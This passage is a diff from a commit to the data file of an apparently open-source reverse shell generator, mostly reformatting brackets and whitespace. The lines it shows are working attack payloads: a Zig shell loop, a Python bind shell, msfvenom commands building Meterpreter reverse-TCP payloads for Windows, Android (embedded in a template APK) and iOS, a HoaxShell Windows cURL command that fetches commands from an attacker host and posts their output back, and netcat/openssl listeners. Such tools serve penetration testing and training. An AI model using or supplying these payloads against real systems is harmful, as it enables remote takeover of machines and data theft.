\"/bin/bash\", \"-c\", line }, allocator);\n if (@import(\"builtin\").os.tag == .windows) {\n process = std.process.Child.init(&[_][]const u8{ \"c:\\\\windows\\\\system32\\\\cmd.exe\", \"/c\", line }, allocator);\n }\n\n process.stderr_behavior = .Pipe;\n process.stdout_behavior = .Pipe;\n\n process.spawn() catch {\n break;\n };\n\n if (process.stderr != null) {\n fifo.pump(process.stderr.?.reader(), writer) catch {\n break;\n };\n }\n\n if (process.stdout != null) {\n fifo.pump(process.stdout.?.reader(), writer) catch {\n break;\n };\n }\n\n _ = process.wait() catch {\n break;\n };\n }\n }\n}\n\n",
|
||||
"meta": ["linux", "windows", "mac"]
|
||||
}
|
||||
]
|
||||
);
|
||||
|
||||
// https://twitter.com/MuirlandOracle -- #Muiri Was Here :D
|
||||
|
||||
const bindShellCommands = withCommandType(
|
||||
const bindShellCommands = withCommandType(
|
||||
CommandType.BindShell,
|
||||
[
|
||||
{
|
||||
[{
|
||||
"name": "Python3 Bind",
|
||||
"command": "python3 -c 'exec(\"\"\"import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind((\"0.0.0.0\",{port}));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())\"\"\")'",
|
||||
"meta": ["bind", "mac", "linux", "windows"]
|
||||
@ -416,10 +418,9 @@ const bindShellCommands = withCommandType(
|
||||
]
|
||||
);
|
||||
|
||||
const msfvenomCommands = withCommandType(
|
||||
const msfvenomCommands = withCommandType(
|
||||
CommandType.MSFVenom,
|
||||
[
|
||||
{
|
||||
[{
|
||||
"name": "Windows Meterpreter Staged Reverse TCP (x64)",
|
||||
"command": "msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f exe -o reverse.exe",
|
||||
"meta": ["msfvenom", "windows", "staged", "meterpreter", "reverse"]
|
||||
@ -514,7 +515,7 @@ const msfvenomCommands = withCommandType(
|
||||
"command": "msfvenom --platform android -x template-app.apk -p android/meterpreter/reverse_tcp lhost={ip} lport={port} -o payload.apk",
|
||||
"meta": ["msfvenom", "android", "android", "reverse"]
|
||||
},
|
||||
{
|
||||
{
|
||||
"name": "Apple iOS Meterpreter Reverse TCP Inline",
|
||||
"command": "msfvenom --platform apple_ios -p apple_ios/aarch64/meterpreter_reverse_tcp lhost={ip} lport={port} -f macho -o payload",
|
||||
"meta": ["msfvenom", "apple_ios", "apple_ios", "reverse"]
|
||||
@ -533,10 +534,9 @@ const msfvenomCommands = withCommandType(
|
||||
);
|
||||
|
||||
|
||||
const hoaxShellCommands = withCommandType(
|
||||
const hoaxShellCommands = withCommandType(
|
||||
CommandType.HoaxShell,
|
||||
[
|
||||
{
|
||||
[{
|
||||
"name": "Windows CMD cURL",
|
||||
"command": "@echo off&cmd /V:ON /C \"SET ip={ip}:{port}&&SET sid=\"Authorization: eb6a44aa-8acc1e56-629ea455\"&&SET protocol=http://&&curl !protocol!!ip!/eb6a44aa -H !sid! > NUL && for /L %i in (0) do (curl -s !protocol!!ip!/8acc1e56 -H !sid! > !temp!\cmd.bat & type !temp!\cmd.bat | findstr None > NUL & if errorlevel 1 ((!temp!\cmd.bat > !tmp!\out.txt 2>&1) & curl !protocol!!ip!/629ea455 -X POST -H !sid! --data-binary @!temp!\out.txt > NUL)) & timeout 1\" > NUL",
|
||||
"meta": ["windows"]
|
||||
@ -594,12 +594,12 @@ const rsgData = {
|
||||
listenerCommands: [
|
||||
['nc', 'nc -lvnp {port}'],
|
||||
['nc freebsd', 'nc -lvn {port}'],
|
||||
['busybox nc', 'busybox nc -lp {port}'],
|
||||
['busybox nc', 'busybox nc -lp {port}'],
|
||||
['ncat', 'ncat -lvnp {port}'],
|
||||
['ncat.exe', 'ncat.exe -lvnp {port}'],
|
||||
['ncat (TLS)', 'ncat --ssl -lvnp {port}'],
|
||||
['rlwrap + nc', 'rlwrap -cAr nc -lvnp {port}'],
|
||||
['rustcat', 'rcat listen {port}'],
|
||||
['rustcat', 'rcat listen {port}'],
|
||||
['openssl', 'openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 30 -nodes; openssl s_server -quiet -key key.pem -cert cert.pem -port {port}'],
|
||||
['pwncat', 'python3 -m pwncat -lp {port}'],
|
||||
['pwncat (windows)', 'python3 -m pwncat -m windows -lp {port}'],
|
||||
@ -636,4 +636,4 @@ if (typeof exports !== 'undefined') {
|
||||
if (typeof window !== 'undefined') {
|
||||
window.rsgData = rsgData;
|
||||
window.CommandType = CommandType;
|
||||
}
|
||||
}
|
||||
Loading…
Reference in New Issue
Block a user